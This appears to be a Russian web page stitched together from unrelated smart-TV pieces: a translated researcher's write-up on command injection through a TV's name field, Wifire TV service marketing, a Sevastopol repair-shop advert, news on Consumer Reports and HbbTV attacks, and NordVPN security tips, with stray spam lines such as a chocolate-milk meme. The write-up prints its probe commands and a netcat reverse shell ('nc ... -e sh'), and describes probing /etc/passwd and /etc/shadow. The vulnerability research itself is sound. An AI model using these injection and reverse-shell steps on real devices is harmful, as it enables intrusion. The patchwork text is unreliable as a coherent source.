Взлом смарт тв: Взлом Smart TV через внедрение команд

Содержание

Взлом Smart TV через внедрение команд

Это был один  из обычных ленивых вечеров, когда я смотрел телевизор после длинного трудового  дня.

Автор: Sven Morgenroth

Это был один из обычных ленивых вечеров, когда я смотрел телевизор после длинного трудового дня. Несмотря на то что чувствовалась усталость, я продолжал размышлять об уязвимости, найденной в роутере, который мне одолжил приятель. Нахождение брешей в подобного рода устройствах всегда является забавным мероприятиям, поскольку вскрываются детали, доступные лишь разработчикам и, возможно, службе технической поддержки.

Поскольку на тот момент я был очень уставшим, то намеревался лишь поставить таймер автоматического выключения и прилечь. Однако во время установки таймера меня заинтересовал вопрос, есть ли скрытые функции в меню настроек телевизора, доступные только разработчикам и службе поддержки. После непродолжительных поисков в Гугле в моем мобильном телефоне я обнаружил, что в этой марке телевизоров предусмотрен код, открывающий скрытое меню.

После повторного открытия настроек я ввел код при помощи пульта управления, и в левом стороне экрана появилось еще одно меню. Практически все категории были недоступны. Я смог только активировать режим «Hotel Mode» и посмотреть версию телевизора.

В тот момент мне захотелось получше узнать свой телевизор. Среди настроек была категория «info», открыв которую я увидел другие номера и версии. Затем мое внимание привлекла возможность, позволяющая назначить имя телевизору.

Уязвимость в Smart TV

При работе в сфере информационной безопасности постоянно приходится тестировать полезные нагрузки в различных полях ввода. К примеру, это может быть параметр GET-запроса, используемого веб-интерфейсом роутера, панели управления нового принтера или, как в моем случае, телевизора. Мне показалось, что будет забавно, если у телевизора будет имя «sleep 5».


Рисунок 1: Параметр для назначения имени телевизору

После ввода полезной нагрузки через пульт управления и сохранения результатов, меню с настройками замерло на некоторое время. Когда телевизор вернулся к жизни я изменил значение параметра, чтобы была возможность добраться до других пунктов меню. В тот момент я еще не догадывался, что нашел нечто похожее на уязвимость, связанную с внедрением команд. На самом деле замирание телевизора на несколько секунд после изменения настроек не являлось чем-то странным. Однако задержка на столь долгое время вызвала у меня любопытство.

Время замирания было намного больше чем 5 секунд. Возможно, все дело было в одиночных кавычках, и телевизор, не ожидая подобных входных данных, выдавал ошибку с целью предотвращения загрузки этих символов. Я попытался повторить эксперимент и ввел `sleep 0`. На этот раз все загрузилось моментально.

Происходило нечто не очень понятное, и я решил измерить время ответа в зависимости от значения параметра функции sleep. Выяснилось, что время замирания меню телевизора всегда в три раза дольше, чем значение этого параметра:

  • sleep (2) — 6 секунд
  • sleep (3) — 9 секунд
  • sleep (5) — 15 секунд

 Запуск команд в телевизоре

Я не мог поверить, что смог внедрить команду после первой же попытки. Замирание меню не было стопроцентным доказательством и в целом не столь полезно, если мы ведем речь об эксплуатации уязвимости. В моем распоряжении был 31 символ (минус две одинарные кавычки), полезная нагрузка должна быть не более 29 знаков.

Ниже показан список команд, которые я пытался запустить в моем телевизоре.  Напротив каждой команды дается пояснение и результат запуска (успешно/неудачно).


Команда

Описание

Количество символов

Успешный запуск

`which nc && sleep 2`

which – команда в Linux, возвращающая путь к приложению (если приложение существует)

&& sleep 2 – заморозка меню на 3*2 секунды, если после выполнение команды which найдена утилита nc (в телевизоре)

19

Да

`which ssh && sleep 2`

Проверка, присутствует ли утилита ssh

20

Нет

`which wget && sleep 2`

Оказалось, что присутствует утилита wget

21

Да

`cat /etc/passwd && sleep 2`

Проверяем, доступен ли файл /etc/passwd на чтение. Оказалось, что да (было бы очень странно, если нет)

26

Да

`cat /etc/shadow && sleep 2`

Если у нас есть права суперпользователя, файл /etc/shadow доступен на чтение. Проверяем, есть ли у нас права суперпользователя. Однако файл оказался недоступным для чтения.

26

Нет

`ls /etc/shadow && sleep 2`

Получаем объяснение, почему файл /etc/shadow не доступен на чтение. Этого файла не существует.

25

Нет

Далее нужно было подсоединить телевизор к ноутбуку через сетевой кабель, но уже сейчас я был доволен тем, что у меня получалось запускать команды в телевизоре лишь при помощи пульта управления.

Получение доступа к шеллу в телевизоре

Мой телевизор крепится к стене, и подключить сетевой кабель оказалось не так просто, как может показаться на первый взгляд. Преодолев некоторые сложности, мне все же удалось подключить кабель к телевизору с одной стороны и к ноутбуку с другой. Далее при помощи утилиты ipconfig я выяснил IP-адрес ноутбука.


Рисунок 2: Сетевые параметры ноутбука

После выяснения IP-адреса ноутбука мне лишь нужно было организовать обратный шелл. Таким образом, не нужно было знать IP-адрес телевизора. Кроме того, обратный шелл удобен тем, что позволяет обходить любые правила фаервола, которые блокируют входящие соединения. Однако перед тем как начать думать о том, как получить шелл, используя 29 символов, я решил по подробнее изучить систему.

Использование Netcat в телевизоре

После того как выяснилось, что в телевизоре есть утилита nc, я решил перенаправить результаты работы определенных команды через nc на мой ноутбук. Первой командой, естественно, стала id, при помощи которой нужно было выяснить, есть ли у нас права суперпользователя в системе телевизора.


Рисунок 3: Результат выполнения команды id

Как видно из рисунка выше, права суперпользователя у нас есть. Сей факт не столь примечателен, но тем не менее. Далее мне захотелось узнать содержимое корневой директории / при помощи команды `ls -la /|nc 169.254.56.216 5`.

Рисунок 4: Содержимое корневой директории

Отлично. Однако у меня до сих пор не было полноценного шелла для выполнения команд. Все возможные варианты не проходили проверку на длину и были не слишком полезными. Однако поскольку версия nc, установленная в телевизоре, поддерживала флаг –e, мне удалось организовать обратный шелл при помощи команды `nc 169.254.213.210 5 -e sh`.


Рисунок 5: Обратный шелл для выполнения команд в телевизоре

Теперь, когда у меня был полноценный шелл, я захотел увидеть результаты своей работы на экране телевизора. Здесь существует несколько возможностей. Например, смена логотипа при загрузке или изменение иконок приложений. Поскольку у меня был Smart TV, уже было установлено несколько программ, например, Youtube и Skype.

Рисунок 6: Приложение, предустановленные в телевизоре

Я заметил, что большая часть файловой системы была доступна только для чтения, и мне не удалось поменять логотип. Однако там были часто меняющиеся картинки, например, рамки превью, которые можно наблюдать при переключении каналов телевизора. Эти превью содержат снимки программ, идущих в тот момент, когда мы переходим в канал. Совершенно очевидно, что данные картинки сохраняются в месте, доступным для чтения и записи файлов.

Иконки хранились в файлах .png. Для получение полного списка файлов с расширением .png я воспользовался командой find / -name *.png, однако среди результатов не оказалось файлов, имеющих отношения к картинкам превью. Я проделал тот же самый трюк с файлами .jpg и заметил имена наподобие channelImage123.jpg. После загрузки нужных файлов и замены файлов, в имени которых содержится строка channelImage, я получил следующий результат.


Рисунок 7: Экран телевизора с обновленными картинками

Ваш телевизор не настолько умен, как вы думаете

Устройства, подключенные к интернету, могут иметь уязвимости в самых неожиданных местах. Там, где вы ожидаете меньше всего. Когда я тестировал команду sleep, то даже не мог и представить, что мой трюк сработает. Первоначально я решил провести свой эксперимент от скуки. Кроме того, я понятия не имел, что мой телевизор работает по управлением ОС Linux, и был еще больше удивлен, что найденные бреши пригодны к эксплуатации.

Данную уязвимость нельзя эксплуатировать удаленно, хотя что-то подсказывает мне, что я был прав, когда решил не подключать свой телевизор к интернету и не использовал продвинутые функции слишком часто. Я бы не ощущал себя комфортно с мыслью о том, что кто-то может управлять моим телевизором.

Предполагаю, что существует более интересные методы и бреши, пригодные для эксплуатации. Однако, думаю, не стоит добавлять седых волос в том момент, когда телевизор замирает, и ты думаешь, вышло ли устройство из строя или нет. В конце концов, телевизор предназначен для расслабления, а не для повышения кровяного давления, за исключением тех случаев, когда вы смотрите спортивные мероприятия. Например, футбол.

Миллионы смарт-телевизоров подвержены опасности взлома

Миллионы смарт-телевизоров имеют брешь в системе безопасности, которой могут воспользоваться хакеры. Об этом говорится в исследовании компании Consumer Reports , которая проанализировала степень безопасности определённых моделей смарт-телевизоров.

В обзоре упомянуты модели телевизоров производства компании Samsung, а также телевизоры китайского производителя TCL, в которых используются определённые функциональные разработки компании Roku, производящей устройства для просмотра потоковых медиа.

Несмотря на то, что брешь в системе безопасности телевизоров не даст хакерам возможности воровать конфиденциальные данные – такие, как номера кредитных карт, злоумышленники могут использовать её для совершения нежелательных действий над телевизорами пользователей. В частности, они могут запускать на них оскорбительный видео-контент, устанавливать нежелательное программное обеспечение или переключать каналы.

«Всё делается достаточно грубо и топорно – так, словно кто-то балуется пультом дистанционного управления с закрытыми глазами, – говорится в публикации Consumer Reports. – Однако для зрителя, который не знает, что происходит, всё выглядит жутко – словно злоумышленник находится где-то рядом или следит за вами через телевизор».

В исследовании Consumer Reports особо подчёркивается растущая популярность телевизоров, подключаемых к интернету, которые облегчают людям использование таких потоковых служб как Netflix, давая возможность смотреть контент прямо на экране своего телевизора. Однако, подключение телевизора к Интернету ставит его под угрозу взлома – если в нём есть уязвимости, которые могут использовать хакеры.

К примеру, в 2012 году группа исследователей систем кибербезопасности продемонстрировала возможность взлома и удалённого управления некоторых моделей смарт-телевизоров производства Samsung. Об этом писал сайт технологических новостей Ars Technica. Эксперты издания Consumer Reports протестировали смарт-телевизоры TCL с установленным программным обеспечением Roku, необходимым для работы с потоковыми медиа, и выявили в нём уязвимость. Следует отметить, что программное обеспечение Roku используют и другие производители телевизоров – в частности, Hisense, Hitachi, Insignia, Philips, RCA и Sharp. Все они, а также некоторые устройства компании Roku для работы с потоковыми медиа, подвержены взлому, говорится в публикации.

Программное обеспечение от Roku для работы с потоковыми медиа включает в себя так называемый интерфейс прикладного программирования, или API, который могут использовать сторонние разработчики, создающие приложения для смартфонов, которые могут работать как пульты дистанционного управления от телевизора. Однако, этим API, который в Consumer Reports назвали «незащищённым», могут воспользоваться и хакеры.

Потенциальными жертвами взлома могут стать люди, использующие свои смартфоны или персональные компьютеры в той же сети Wi-Fi, к которой подключён их смарт-телевизор, и посетившие зараженный сайт или скачавшие приложение, содержащее программный код, написанный хакерами, сообщает издание.

В свою очередь в компании Roku поставили под сомнение выводы, сделанные экспертами Consumer Reports, написав в официальном блоге, что в своей публикации эксперты «неверно описывают функции данного программного обеспечения».

«Использование данного API не несёт никаких рисков для учётных записей наших клиентов или платформы API», – заявляют в Roku, добавляя, что пользователь может вручную отключить эту спорную функцию удалённого контроля.

Отвечая на вопрос Consumer Reports о подобной уязвимости в смарт-телевизорах Samsung, не использующих программное обеспечение Roku, представитель пресс-службы Samsung заявил, что в компании изучают данную проблему и планируют в текущем году выпустить обновление, которое должно устранить все подобные ошибки.

Как смотреть Wifire TV

Wifire TV

Один аккаунт для всех платформ

Подключив услугу Wifire TV, Вы сможете, используя один аккаунт, к которому привязан лицевой счет,
смотреть ТВ-каналы, фильмы и сериалы на платформах IOS, Android, Android TV, Apple TV, а также на любом телевизоре через ТВ-приставку Wifire.

Телевизор +
ТВ-приставка Wifire
  • Подключается к любому телевизору через HDMI или
    аналоговый выход (AV)
  • Цифровое качество картинки в формате высокой (HD)
    и стандартной (SD) четкости
  • Функции паузы, перемотки и записи эфира, просмотр
    прошедших передач
  • Огромная онлайн библиотека фильмов, сериалов,
    мультфильмов (Start)
  • Функция медиаплеера для просмотра видео и фото с
    USB носителей
Smart TV +
Приложение Wifire TV
  • Доступно на платформах Android TV, LG Smart TV,
    Samsung Smart TV
  • Цифровое качество картинки в формате высокой (HD)
    и стандартной (SD) четкости
  • Просмотр каналов, фильмов и сериалов
  • Функции паузы, перемотки и записи эфира, просмотра
    прошедших передач

Приложение Wifire TV может быть несовместимо с некоторыми моделями указанных телевизоров. Вы можете уточнить доступность приложения для Вашей модели телевизора в службе поддержки

Планшеты / смартфоны +
Приложение Wifire TV
  • Доступно на платформах Android и iOS
  • Цифровое качество картинки в формате высокой (HD)
    и стандартной (SD) четкости
  • Просмотр каналов, фильмов и сериалов
  • Функции паузы, перемотки и записи эфира, просмотра
    прошедших передач
APPLE TV+
Приложение Wifire TV
  • Доступно для Apple TV 4-го поколения и выше
  • В приложении доступно более 140 телеканалов
  • Цифровое качество картинки в формате высокой (HD)
    и стандартной (SD) четкости
  • Функции перемотки эфира и просмотра
    прошедших передач
  • Поддержка Apple TV Touch  Remote
  • Поддержка Apple AirPlay
ТВ приставка на базе Android
Приложение Wifire TV
  • Адаптировано под просмотр с телевизора
    и для управления с пульта
  • Доступно на телевизионных приставках
    на базе Android 4.4+
  • Цифровое качество картинки в формате высокой (HD)
    и стандартной (SD) четкости
  • Просмотр каналов, фильмов и сериалов
  • Функции паузы, перемотки и записи эфира,
    просмотра прошедших передач
ВЫ ЗАБЫЛИ СВОЙ ЛОГИН И ПАРОЛЬ?

Восстановление Ваших


учетных данных

Для восстановления данных введите номер телефона,
который Вы указывали при регистрации. Вам придет SMS
с логином, паролем, номером лицевого счета и пин-кодом.

Ремонт Смарт ТВ (Smart TV) телевизоров

В предыдущей нашей статье мы писали о выборе смарт тв, а сегодня мы поговорим о его ремонте. Но для понимания основ ремонта обратимся к опять же к предыдущей статье, а именно к основным блокам из которых состоит любой современный телевизор, напомним это:

— Блок матрицы;

— Блок питания;

— Блок майн платы (платы управления);

— Блок TCon.

Как у любой контроллерной техники поломки бывают программные и механические, которые для каждого блока являются принципиально различными. Рассмотрим вкратце каждые из них:

  1. Программный ремонт тв – сводится, как к прошивке микроконтроллеров различных блоков, так и прошивке Flash памяти майн блока, в которой содержится, структура smart menu, различные настройки, правила работы различных блоков и многое другое. Программный ремонт сводится к перепрограммированию необходимых микросхем на специальном программаторе с последующей конфигурацией сервисным пультом (не путать с обычным пультом).

Причинами таких поломок, как правило является:

— неудачное обновление прошивки через меню смарт ТВ;

— перепады напряжения в сети;t tv, телевизор ремонт, выбрать телевизор

— некорректные настройки в Smart TV;

— взлом прошивки сторонними программами.

  1. Механический (аппаратный) ремонт тв – более трудоемкий процесс, который сводится к элементному ремонту вышедшего из строя блока. Для устранения поломки такого характера используется различное специализированное оборудование: паяльные станции, осциллограф, мультиметр и прочие тестеры основываясь на принципиальной схеме блока.

Причинами таких поломок, как правило является:

— механическое повреждение элементов или блоков тв;

— перепады напряжения в сети;

— стороннее вмешательство некомпетентными специалистами;

— непрофессиональный ремонт.

Как правило поломка механического характера вашего смарт тв, сопровождается совместно и с программным сбоем.

Хотим обратить ваше внимание на очень занимательный факт, что любые ремонты led, плазменных телевизоров проводятся строго в стационарных условия сервисного центра. Многие пользователи пытаясь сэкономить на ремонте, ищут мастера по ремонту телевизоров в Севастополе на дому. И в результате некомпетентности мастера в итоге обращаются за помощью в ближайший сервисный центр, где получают заключение с еще большим чеком ремонта.

Объясним вам на нескольких примерах почему ремонт тв не производится, как раньше в домашних условиях. Признаки неисправности в большинстве случаев одинаковы (нет изображения, нет звука, тв не включается, разбита матрица). По каждому дефекту поломок может быть сколь угодно много. Например есть звук, но нет изображения, причина в этих случаях может скрываться в любом из блоков, в большинстве случаев сгорает led подсветка, для ее ремонта необходимо полностью разобрать саму матрицу и заменить вышедшую из строя линейку, но это лишь один из примеров.

Для такого рода ремонтов необходимо обладать достаточным опытом в этой области, недостаточно просмотра ролика на Youtube. И более того ремонт led  телевизоров Samsung, отличается от телевизоров LG, как архитектурой так и элементной базой. Очень часто некомпетентность мастеров доводит до не ремонтопригодности изделия.

Не переплачивайте за ремонт, экономьте свое время, получайте компетентную поддержку рядом со своим домом. Наш сервисный центр специализируется на ремонте любых брендов плазменных, lcd, Led телевизоров и обладает достаточной технической и элементной базой. Мы производим ремонты любой сложности, замену матриц, led подсветки, ремонт smart tv приставок, настройку smart tv и конфигурацию смарт меню, а также многое другое. Более того на все ремонты выдается гарантия и положительная рекомендация наших довольных клиентов. Севсервис – лучший сервисный центр по ремонту тв в Севастополе.

 

Читайте также другие наши интересные разделы Поддержки

Вирус и как его удалить

Adobe Flash Player Offline для жителей Крыма

Android Play Market Крым

Adobe Acrobat Reader DC для Крыма

App Store в Крыму

Ваш Smart TV может быть взломан хакерами и собирает ваши данные — Безопасность И Конфиденциальность

Умный телевизор — одно из главных преимуществ современных технологий. Это, конечно, когда ваш телевизор подключается к Интернету и позволяет вам получать доступ к вашим потоковым службам и приложениям без необходимости использования другого внешнего гаджета. Идея имеет большой смысл: объедините лучшие части телевизионной приставки и телевизора в одну супер-машину.

Умные телевизоры, несомненно, изменили то, как многие из нас смотрят телевизор. Однако, если у вас есть один из этих умных телевизоров, вам необходимо знать о любых проблемах безопасности и конфиденциальности, которые могут у них возникнуть.

Consumer Reports проверил пять умных телевизоров от самых популярных брендов в США и обнаружил, что некоторые устройства уязвимы для взлома и могут собирать ваши просмотренные данные.


В качестве интеллектуальных телевизоров были протестированы отчеты о потребителях Samsung UN49MU8000, LG 49UJ7700, TCL 55P605, Sony XBR-49X800E и Vizio P55-E1 SmartCast TV.

Читайте дальше и узнайте больше о выводах Consumer Reports.

Удаленный угон

В Consumer Reports говорится, что у умных телевизоров Samsung и телевизоров Roku TCL есть проблемы с безопасностью, которые могут позволить хакерам удаленно управлять ими через Интернет.


Хотя эти хаки не будут раскрывать личную информацию о пользователях, они позволят злоумышленникам выполнять такие действия, как управление громкостью и каналами, открывать явный контент YouTube или устанавливать приложения без разрешения. Короче говоря, это все равно что передать им свой пульт от телевизора издалека.

По словам CR, уязвимость TCL Roku распространяется и на другие гаджеты, на которых установлена ​​система Roku. Сюда входят потоковые плееры Roku и телевизоры других производителей, таких как Philips, Sharp, Hisense, RCA, Hitachi и Insignia.

Вы в опасности?

Как работает Roku hack? Ну, у Roku есть приложения, которые позволяют вам управлять ими через ваш смартфон или планшет. Пока вы находитесь в одной сети Wi-Fi, эти приложения могут искать подключенные гаджеты Roku и мгновенно подключаться к ним без необходимости сопряжения кодов.


Теперь, поскольку интерфейс дистанционного управления Roku открыт, любой, кто сможет подключиться к вашей сети Wi-Fi или подключиться к ней, сможет управлять вашим телевизором Roku или потоковым устройством.

Это так просто, как кажется? На самом деле, нет. Дело в том, что злоумышленнику необходимо сначала проникнуть в вашу сеть Wi-Fi, установив вредоносное ПО на телефон или ноутбук. Сам твой Roku гаджет не заражен.


я люблю шоколадное молоко мем

Я не пытаюсь защищать Roku здесь, но я думаю, что если кто-то может проникнуть в сеть Wi-Fi, у вас есть более серьезные проблемы, чем незнакомец, играющий с регуляторами громкости вашего телевизора.


Смарт-пульт Samsung Smart TV «взломать» работает аналогично, но с ключевым отличием.

Поскольку вам требуется код сопряжения, прежде чем вы сможете подключить приложение дистанционного управления к смарт-телевизору Samsung, взлом будет работать только в том случае, если вам удастся открыть вредоносную страницу с помощью того же сопряженного устройства. Опять же, кто-то должен заставить вас запустить вредоносный код с помощью фишинговой электронной почты, вложений или отравленной рекламы.

С атаками Smart TV и Roku, и Samsung, если вы следуете обычным мерам предосторожности в отношении компьютерной безопасности, то все будет в порядке.

Сбор данных

Consumer Reports также рассмотрел методы сбора данных на интеллектуальных телевизорах и обнаружил, что большинство из них имеют систему, называемую «Автоматическое распознавание контента» (ACR).


ACR — это как всевидящее око, которое отслеживает все, что вы смотрите на своем телевизоре, и оно может использовать это в сочетании с вашими личными данными для отправки вам целевой рекламы.

CR заявил, что умные телевизоры предназначены для преднамеренного обмена, и ограничение сбора данных может нанести ущерб функциональности. Некоторые устройства, такие как телевизоры Sony с ОС Android, даже имеют условия «все или ничего», которые заставляют вас нажимать «да» в политике конфиденциальности и условиях обслуживания, прежде чем вы сможете завершить процесс установки.

Отслеживание пользователей в умных телевизорах не является чем-то новым. На самом деле, мы всегда предупреждали вас о методах сбора данных на интеллектуальных телевизорах и предлагали способы их отключения.

Нажмите здесь, чтобы узнать, как не дать вашему телевизору шпионить за вами.

Как защитить себя

Первое решение простое, но, возможно, непрактичное — отключите ваш умный телевизор от интернета. Это, конечно, делает функции, которые полагаются на подключение к Интернету, такие как потоковые видео-сервисы и погодные приложения, совершенно бесполезными и могут не подходить для некоторых людей.


Кроме того, если вы действительно беспокоитесь о последствиях для безопасности в этом развивающемся мире устройств «Интернет вещей», подключенных к сети, возможно, просто воздержитесь от их покупки. Если вы считаете, что удобство использования этих умных гаджетов не стоит того, чтобы рисковать, то вы можете не пускать их в свой дом.

Тем не менее, для обычных потребителей, которые все еще хотят воспользоваться преимуществами современных технологий, сохраняя при этом безопасность и конфиденциальность в качестве приоритета, лучшая защита состоит в том, чтобы все ваши умные гаджеты были исправлены новейшими прошивками. И не забывайте, как всегда, быть очень бдительными и защищать свою сеть — не открывайте неизвестные ссылки и вложения, отправленные вам.

Нажмите здесь, чтобы прочитать полный отчет Consumer Reports.

Для более глубокого обсуждения, вы обязательно захотите послушать подкаст

В этом подкасте вы узнаете эти малоизвестные секреты о умных телевизорах и что вы можете с этим поделать. Мы поговорим о вашей конфиденциальности.

Некоторые модели не очень удобно следят за своими владельцами, и на самом деле нет веских причин для такого изменчивого поведения. Мой совет: выключите эту функцию. Мы тоже это рассмотрим.

Вы можете спросить себя: «Как это возможно?» Как телевизор может быть настолько умным, чтобы шпионить за вами? Опять же, речь идет о подключении к интернету.

Но не все Smart TV являются шпионами, даже если они подключены к сети. Это действительно зависит от того, что говорится в политике конфиденциальности производителя телевизора, но кто когда-либо это читает? Итак, защита важна. Да, даже ваш компьютер нуждается в защите.

Послушайте следующий подкаст, где вы найдете подробное описание умных телевизоров и вашей конфиденциальности. Нажмите кнопку воспроизведения ниже, и вы даже можете слушать, работая над другими задачами. Просто держите вкладку с открытым подкастом и приступайте к работе.


продажа кассет vhs на ebay

Ваш умный телевизор шпионит за вами

Будущее технологий, безусловно, захватывающее, поэтому присоединяйтесь ко мне в этом постоянно меняющемся путешествии, подписавшись на мои подкасты. Это самые провокационные технические подкасты на планете.


Нажмите на ссылку, которую мы предоставили ниже в синих прямоугольниках, чтобы перейти на мою бесплатную страницу подкаста, чтобы начать. Если вы читаете эту статью с помощью приложения, нажмите здесь, чтобы посетить мою бесплатную страницу подкаста.

Взломать по телесигналу можно 90% Smart TV

Все методы взлома Smart TV, известные прежде, включая разработанный командой из ЦРУ инструмент Weeping Angel, требовали хотя бы кратковременного физического доступа к телевизору для установки вредоносного кода с USB-флэшки, либо чтобы пользователь сам загрузил троянца, «клюнув» на приёмы социальной инженерии.

Из-за этих ограничений кибератаки на умные ТВ никогда не считались серьезной угрозой.

На семинаре по кибербезопасности медиа, который под эгидой Европейского Вещательного Союза (European Broadcasting Union, EBU) прошёл в Женеве в феврале, была продемонстрирована новая атака на умные телевизоры (smart TV), позволяющая с помощью сигналов DVB-T (Digital Video Broadcasting — Terrestrial) получать контроль над этими устройствами и использовать их в преступных целях, например, для организации атак DDoS или слежки за пользователями.

Техника, которую показал Рафаэл Шиль (Rafael Scheel), занимающийся исследованиями информационной безопасности для швейцарской консультационной фирмы Oneconsult, гораздо более опасна: атака осуществляется дистанционно, не требует вмешательства пользователя и происходит незаметно для него — в фоновом режиме. По заявлению разработчика, жертвами её могут стать порядка 90% телевизоров, выпускаемых в последние годы.

Автор утверждает, что, потратив от 50 до 150 долларов, любой может сделать передатчик DVB-T и передавать с его помощью команды HbbTV (Hybrid Broadcast Broadband TV) — промышленного стандарта, поддерживаемого в технологиях телетрансляции DVB-T, DVB-C или IPTV.

По умолчанию, любой телевизор подключается к более сильному сигналу DVB-T, поэтому передатчик взломщика, расположенный поблизости (например, смонтированный на дроне), заглушит ретрансляторы кабельных провайдеров, отдаленные на десятки и сотни километров.

Главная проблема стандарта HbbTV, поддерживаемого всеми производителями умных ТВ, по словам Шиля заключается в том, что он допускает загрузку веб-сайтов в фоновом режиме. Чтобы издать команду на загрузку страницы с вредоносным сценарием JavaScript, передатчик достаточно включить всего на минуту, и если хакер не будет больше выходить в эфир, найти его, равно как и установить сам факт атаки будет невозможно.

Более того, заражённый телевизор проще выкинуть, чем «вылечить», так как установленное злоумышленниками ПО может блокировать любые механизмы обновления прошивки. В тех устройствах, которые тестировал Шиль, вирус не удалялся даже после аппаратного сброса на заводские настройки.

Как защитить ваш Smart TV от взлома — полезные статьи

Я говорил это раньше, и я скажу это снова, умные телевизоры — худшие. Дополнительное программное обеспечение обычно достаточно громоздкое, чтобы мешать тому, что вы на самом деле хотели посмотреть, и обновления не приходят так быстро и последовательно, как на автономных потоковых устройствах. Большинство моделей также имеют серьезные проблемы с конфиденциальностью, поскольку компании часто используют их для отслеживания того, что вы смотрите. Теперь есть еще одна причина избегать умного телевидения: вас могут взломать.

Исследование Consumer Reports показало, что умные телевизоры Samsung подвержены взлому. Подобная уязвимость также затрагивает телевизоры, использующие платформу Smart-TV компании Roku. Похоже, хакеры могут заставить ваш телевизор переключать каналы, увеличивать громкость или (хуже всего) воспроизводить случайные видео на YouTube. На самом деле они не могут шпионить за вами или украсть какую-либо личную информацию, но это все равно может вызывать беспокойство

Для Roku TV все, что нужно хакеру для получения контроля, — это заразить компьютер или мобильное устройство, подключенное к тому же Wi-Fi, что и ваш телевизор, вредоносным ПО. Телевизоры Samsung немного сложнее взломать, но если вы использовали удаленное приложение компании на своем телефоне, вы могли бы быть в опасности.

Если вы беспокоитесь о том, что ваш умный телевизор может быть взломан, есть несколько способов избежать этого. Когда дело доходит до телевизоров Samsung, просто не используйте удаленное приложение, и все будет в порядке. К сожалению, телевизоры Року немного сложнее защитить. Лучше всего полностью отключить Wi-Fi-подключение телевизора, превратив его в немой телевизор, а затем подключив его к отдельному потоковому устройству.

Конечно, самое простое решение — просто не покупать смарт-телевизор. Вместо этого возьмите обычный телевизор, и если вы не можете его найти, просто купите монитор компьютера и подключите его непосредственно к вашему потоковому устройству.

Взломать Smart TV проще, чем вы думаете

65% британцев пользуются Smart TV, но многие ничего не делают для их защиты .

Новое исследование, проведенное ведущим поставщиком виртуальных частных сетей NordVPN, показало, что более 65% британцев имеют дома смарт-телевизоры. Однако почти каждый четвертый ничего не делает для защиты своих смарт-устройств.

В 2019 году ФБР выпустило предупреждение о том, что смарт-телевизоры могут сделать пользователей уязвимыми для слежки и атак со стороны злоумышленников.С тех пор технологии безопасности пользователей стали более продвинутыми, но устройства, подключенные к Интернету, остаются уязвимыми.

«Как и любое устройство, которое регулярно подключается к Интернету, смарт-телевизоры собирают много личных данных, что приводит к различным проблемам конфиденциальности и безопасности. Но, в отличие от других интеллектуальных устройств, они не могут быть оснащены новейшим программным обеспечением кибербезопасности (например, антивирусом), что делает их еще более уязвимыми для киберпреступников», — комментирует эксперт по цифровой безопасности NordVPN Даниэль Маркусон.

О чем нам следует беспокоиться?

При использовании смарт-телевизоров вероятность того, что кто-то действительно смотрит или слушает пользователей, намного выше, чем при использовании традиционного телевизора. Хакеры могут получить доступ к камере и микрофону смарт-телевизора через вредоносное ПО, которое они могут внедрить в телевизор пользователя, если он подключен к сети Wi-Fi. Они могут использовать кадры из спальни или гостиной, чтобы впоследствии шантажировать пользователей и их семьи. ЦРУ однажды создало подобное вредоносное ПО для прослушивания пользователей через смарт-телевизоры Samsung.Если они смогли это сделать, то смогут и хакеры.

Отслеживание — еще одна проблема, о которой должны беспокоиться пользователи. Как и любое смарт-устройство, смарт-телевизоры используют множество трекеров. Такие сервисы, как Netflix, Hulu или HBO GO, собирают данные пользователей и отслеживают их потоковое поведение, чтобы персонализировать их взаимодействие с платформами. Проблема в том, что вы никогда не знаете, где могут оказаться ваши данные, поскольку крупные компании постоянно сталкиваются с утечкой данных. Вышеупомянутые стриминговые сервисы не являются исключением из правил.

Кроме того, если смарт-телевизор используется для просмотра веб-страниц, он также может быть заражен различными вирусами. Как и компьютеры, умные телевизоры работают на программном обеспечении, но на них не установлены такие же мощные антивирусы и брандмауэры. После заражения телевизора вся история просмотров, пароли и другие личные данные становятся доступными для хакеров. И они не упустят возможности использовать эту информацию в атаках программ-вымогателей или продать ее в даркнете.

Как повысить безопасность вашего Smart TV?

«Вам не нужно выбирать между отличным онлайн-телевидением и надежной защитой — можно иметь и то, и другое.Поскольку мировой рынок смарт-телевизоров в прошлом году достиг 202,1 млрд долларов, нам необходимо научиться правильно защищать эти устройства», — говорит Даниэль Маркусон из NordVPN и дает несколько советов по повышению безопасности вашего смарт-телевизора.

  • Используйте надежные пароли . Если ваш телевизор регулярно или постоянно подключен к Интернету, убедитесь, что само устройство, а также любые установленные на нем приложения используют надежные, трудно угадываемые пароли. Хороший пароль должен быть длинным, сложным и рандомизированным, состоящим из комбинации цифр и букв.
  • Всегда обновляйте программное обеспечение вашего телевизора при появлении новой версии. Theexpert говорит, что обновления программного обеспечения имеют решающее значение для кибербезопасности, поскольку производители делают все возможное для исправления уязвимостей. Обновления часто устраняют недостатки безопасности, исправляют или удаляют различные ошибки, добавляют новые функции и улучшают существующие.
  • Защитите свой маршрутизатор. Наряду с любыми другими устройствами IoT, которые у вас могут быть, ваш Smart TV, вероятно, будет подключаться к Интернету через маршрутизатор в вашем доме.Убедитесь, что ваш маршрутизатор максимально безопасен и защищен. Конечно, надежные пароли необходимы, но вы также можете включить VPN для своего маршрутизатора, чтобы шифровать любые данные, проходящие через него.

ПОДРОБНЕЕ:

  • Скачивайте приложения только из официальных магазинов. Не устанавливайте на Smart TV никакие программы и игры из неофициальных источников. Убедитесь, что и приложение, и его провайдер надежны. Более того, если приложение запрашивает доступ к вашим данным, камере или микрофону, который не нужен для его работы, никогда не предоставляйте его.
  • Выключайте телевизионную камеру, когда она не используется. Будь то встроенная камера или камера, подключенная к телевизору через Wi-Fi, выключайте ее, когда она не используется. Если вы не можете выключить камеру, заклейте объектив скотчем или наклейкой.

Чтобы узнать больше новостей от Top Business Tech, не забудьте подписаться на наш ежедневный бюллетень!

Следуйте за нами на LinkedIn и Twitter

Как хакеры проникают в ваш смарт-телевизор

В наши дни, когда вы заходите в магазин электроники, продаваемые телевизоры, скорее всего, являются смарт-телевизорами, и если вы покупаете один из них для просмотра крупной игры, вам нужно позаботиться о безопасности своих данных.

Мы делаем покупки на наших умных телевизорах, используем их, чтобы играть в видеоигры или смотреть наши любимые шоу в потоковом сервисе. Но поскольку наши телевизоры подключены к Интернету, хакеры могут найти способ проникнуть внутрь.

«Если вы смотрите свой смарт-телевизор и приложения меняются, возможно, кто-то проник в ваше устройство», — сказал Джозеф Мартинес, специалист по безопасности информационных систем. профессор Технического колледжа Милуоки.

«Хакеры проникают через Wi-Fi, потому что люди не понимают, что нужно защищать веб-браузер», — объяснил Мартинес.

